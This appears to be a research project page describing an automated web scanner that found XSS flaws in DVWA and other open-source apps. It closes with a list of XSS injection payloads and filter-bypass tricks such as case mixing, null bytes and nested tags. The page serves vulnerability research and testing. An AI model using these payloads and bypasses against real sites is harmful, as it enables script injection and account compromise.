Some of the Vulnerabilities we found

We log changes to the application’s state and verify vulnerabilities through page and state backtracking.

Our experiments identified 10 XSS vulnerabilities across 12 open-source web applications, including 4 unique vulnerabilities that were missed by other scanners. Below are two examples of these unique vulnerabilities found in DVWA, along with explanations of why other methods failed to detect them, but our approach succeeded.

reflected XSS

The "id" parameter is not properly sanitized and is directly inserted into the page code, leading to a reflected XSS vulnerability. This vulnerability is triggered by an element at the bottom of the web application. Accessing elements above it may hide the vulnerable element, making it difficult to trigger unless the web application's other elements are handled correctly. Our approach infers the user's intent and manages inter-element dependencies. Rather than sequentially testing each element, we ensure proper access to the vulnerable element before taking actions that could hide it.

DOM XSS

This vulnerability triggers a DOM XSS by manipulating the "default" value in the URL parameter. The web application includes a function to set the security level, with the default set to the highest level, deemed nearly "impossible" to attack. Positioned at the end of the application, this function is often bypassed by other scanners or reached late in their scanning process. As a result, triggering the DOM XSS is difficult since the vulnerability only appears after the security level is modified. Additionally, scanners like BlackWidow pre-fill form fields consistently select the fixed value "impossible" value for the security setting, making it unlikely to detect vulnerabilities that require adjusting form values to modify the web application's state. In contrast, our approach modifies the security setting early in the scanning process, changing it to "low" to effectively identify and exploit the vulnerability.

XSS payloads and bypass Strategies

Payloads:
- <script>xss([HOYEN-PAYLOAD-INJECT])</script>
- \"'><script>xss([HOYEN-PAYLOAD-INJECT])</script>
- <img src="x" onerror="xss([HOYEN-PAYLOAD-INJECT])">
- <svg onload=xss([HOYEN-PAYLOAD-INJECT]);>
- '\"><svg onload=xss([HOYEN-PAYLOAD-INJECT]);>
- <a href="" jaekpot-attribute="[HOYEN-PAYLOAD-INJECT]">jaekpot</a>
- x" jaekpot-attribute="[HOYEN-PAYLOAD-INJECT]" fix="
- x" onerror="xss([HOYEN-PAYLOAD-INJECT])"
- x" onerror="xss(\'[HOYEN-PAYLOAD-INJECT]\')"
- </title></option><script>xss([HOYEN-PAYLOAD-INJECT])</script>
- <div style="background-image:url(javascript:xss([HOYEN-PAYLOAD-INJECT]))></div>
- <style>body {background-image:url("javascript:xss([HOYEN-PAYLOAD-INJECT])")}</style>
- <%0ascript>xss([HOYEN-PAYLOAD-INJECT])</script>
- <%0bscript>xss([HOYEN-PAYLOAD-INJECT])</script>

Bypass Strategies:
- #[payload]
- -->[payload] ScRiPt
- script --> ScRScrIPtiPt
- script --> ScRiPt>
- script --> S%00c%00R%00i%00P%00t
- script--> ScR<ScrIPt>iPt
- ' ' --> '/'
- ' ' --> '%0a'
- '()' --> '``'
- window.onerror=xss; throw

Google Sites

Report abuse